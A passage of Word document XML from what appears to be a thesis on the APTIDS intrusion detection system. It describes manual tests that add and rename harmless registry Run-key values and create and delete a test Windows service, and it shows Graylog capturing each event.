      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00326F1A" w:rsidP="00326F1A">
      <w:r>
        <w:t xml:space="preserve">In this section we demonstrate the experiments have been processed with APTIDS. There are three tests used for </w:t>
      </w:r>
      <w:r w:rsidR="00061DAF">
        <w:t>qualifying APTIDS functionalities: The manual test in which we create registry keys and services manually; the real case test in which we run some sample of malware for capture its activities added to service and registry database; and the final one is the test using Sentry for overall forensic the whole system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00061DAF" w:rsidP="00326F1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc485239613"/>
      <w:r>
        <w:t>Manual testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
      <w:r>
        <w:t>For testing APTIDS handily, we create and modify some registry keys and services according to the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5244"/>
        <w:gridCol w:w="1981"/>
      </w:tblGrid>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRPr="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061DAF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061DAF" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00297A98" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add Registry key:</w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2" w:rsidRPr="00AD0CD2">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HKLM/Software/Microsoft/Windows/Current Version/Run/ </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Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00297A98" w:rsidRDefault="0005024F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Add Registry key name: </w:t>
            </w:r>
            <w:r w:rsidRPr="0005024F">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HK</w:t>
            </w:r>
            <w:r w:rsidR="00F533E7">
              <w:t>LM</w:t>
            </w:r>
            <w:r>
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/</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Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify the Registry name:</w:t>
            </w:r>
            <w:r w:rsidR="00845C37">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00845C37" w:rsidRPr="00845C37">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to be: </w:t>
            </w:r>
            <w:r w:rsidR="00845C37">
              <w:t>aaaTesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve"> Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00861E5F" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modify the Registry name: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to be: bbbTesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">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Registry Subkey:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HK</w:t>
            </w:r>
            <w:r w:rsidR="00F533E7">
              <w:t>LM</w:t>
            </w:r>
            <w:r>
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/</w:t>
            </w:r>
            <w:r w:rsidR="00252341">
              <w:t>New Key #1</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Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify Registry Subkey:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00F533E7" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKLM</w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2">
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/APTIDS_Testing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Service name: AAATesting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Delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Delete Service name: AAATesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00845C37" w:rsidRDefault="00845C37">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00845C37" w:rsidP="00C425FC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Firstly, w</w:t>
      </w:r>
      <w:r w:rsidR="00297A98">
        <w:t xml:space="preserve">e run Regedit.exe under Administrator authority for modifying Registry Database. First, we add </w:t>
      </w:r>
      <w:r w:rsidR="00E34E4E">
        <w:t>2 String value named “New Value #1” and “New Value #2” in “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E34E4E" w:rsidRDefault="00E34E4E" w:rsidP="00E34E4E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21481CAF" wp14:editId="18435317">
            <wp:extent cx="5581650" cy="3843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3843020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRPr="00F21629" w:rsidRDefault="00E34E4E" w:rsidP="00F21629">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc485239553"/>
      <w:r w:rsidRPr="00F21629">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6</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F21629" w:rsidRPr="00F21629">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding 2 Registry Value using Regedit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:r>
        <w:t>On Graylog server, we find that there is a stream notifying our activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E82792D" wp14:editId="099328D3">
            <wp:extent cx="5581650" cy="2031365"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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2031365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRPr="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc485239554"/>
      <w:r w:rsidRPr="008C0E09">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7</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008C0E09">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture Event for creating and deleting service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43" w:rsidP="008C0E09">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21629" w:rsidRDefault="00BF4EFF" w:rsidP="00F21629">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The event information in detail</w:t>
      </w:r>
      <w:r w:rsidR="009B5282">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00BF4EFF" w:rsidP="00E56A43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D14E9B8" wp14:editId="4201E613">
            <wp:extent cx="5581650" cy="501904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650" cy="5019040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43" w:rsidP="00E56A43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc485239555"/>
      <w:r w:rsidRPr="00E56A43">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8</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E56A43">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog </w:t>
      </w:r>
      <w:r w:rsidR="009B5282">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>event information in detail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32308" w:rsidRDefault="00E56A43" w:rsidP="00B32308">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The following activities is used to test whether APTIDS can notify any change that happen to </w:t>
      </w:r>
      <w:r w:rsidR="0005024F">
        <w:t xml:space="preserve">a value </w:t>
      </w:r>
      <w:r w:rsidR="00B32308">
        <w:t xml:space="preserve">name and value data. We modify the registry value named “New Value #1” to be “aaaTesting”, then we change the value </w:t>
      </w:r>
      <w:r w:rsidR="00A35B52">
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00B32308">
        <w:t xml:space="preserve"> of “New Value #2” </w:t>
      </w:r>
      <w:r w:rsidR="00A35B52">
        <w:t>to “bbbTesting”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454802" w:rsidRDefault="00A35B52" w:rsidP="00454802">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C66F8B8" wp14:editId="5C8EFFF1">
            <wp:extent cx="5581650" cy="3855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3855085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32308" w:rsidRDefault="00454802" w:rsidP="00454802">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc485239556"/>
      <w:r w:rsidRPr="00454802">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9</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00454802">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify registry name for experimenting.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52">
      <w:r>
        <w:t>Events captured in Graylog server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297CD0A1" wp14:editId="3A64098C">
            <wp:extent cx="5581650" cy="1975485"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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1650" cy="1975485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRPr="0054192D" w:rsidRDefault="00A35B52" w:rsidP="0054192D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc485239557"/>
      <w:r w:rsidRPr="0054192D">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10</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0054192D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture events that modify Registry Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52"/>
    <w:p w:rsidR="0054192D" w:rsidRDefault="0054192D" w:rsidP="00A35B52"/>
    <w:p w:rsidR="0054192D" w:rsidRDefault="0054192D" w:rsidP="00A35B52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The final test with regedit, we create a Subkey, then modify its name to be APTIDS_Testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="00252341" w:rsidP="00252341">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B50FAA" wp14:editId="36DC2D88">
            <wp:extent cx="5581650" cy="3846195"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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1650" cy="3846195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRPr="000D1EBA" w:rsidRDefault="00252341" w:rsidP="000D1EBA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc485239558"/>
      <w:r w:rsidRPr="000D1EBA">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11</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding a Registry subkey and </w:t>
      </w:r>
      <w:r w:rsidR="000D1EBA" w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>modifying s</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ubkey name.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="00252341" w:rsidP="00A35B52">
      <w:r>
        <w:t>Graylog captures our events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="00252341" w:rsidP="000D1EBA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6E1030" wp14:editId="456FC480">
            <wp:extent cx="5581650" cy="1664335"/>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1650" cy="1664335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc485239559"/>
      <w:r w:rsidRPr="000D1EBA">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12</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture events that modify Subkey</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finally, in the manually experiment, we create and delete a Windows Service</w:t>
      </w:r>
      <w:r w:rsidR="00B56746">
        <w:t xml:space="preserve"> named “aaaTesting”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using the “sc” command executed in Windows Command Prom</w:t>
      </w:r>
      <w:r w:rsidR="00ED493B">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED493B" w:rsidRDefault="00ED493B" w:rsidP="00ED493B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73662842" wp14:editId="050E1EF7">
            <wp:extent cx="5581650" cy="3616960"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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650" cy="3616960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B56746" w:rsidRDefault="00ED493B" w:rsidP="00ED493B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc485239560"/>
      <w:r w:rsidRPr="00ED493B">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13</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED493B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creating and deleting a Windows Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="002502B7" w:rsidRDefault="002502B7" w:rsidP="002502B7">
      <w:r>
        <w:t>Graylog captures the events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002502B7" w:rsidRDefault="002502B7" w:rsidP="002502B7">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B4BEB4" wp14:editId="25B1550D">
            <wp:extent cx="5581650" cy="137922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650" cy="1379220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
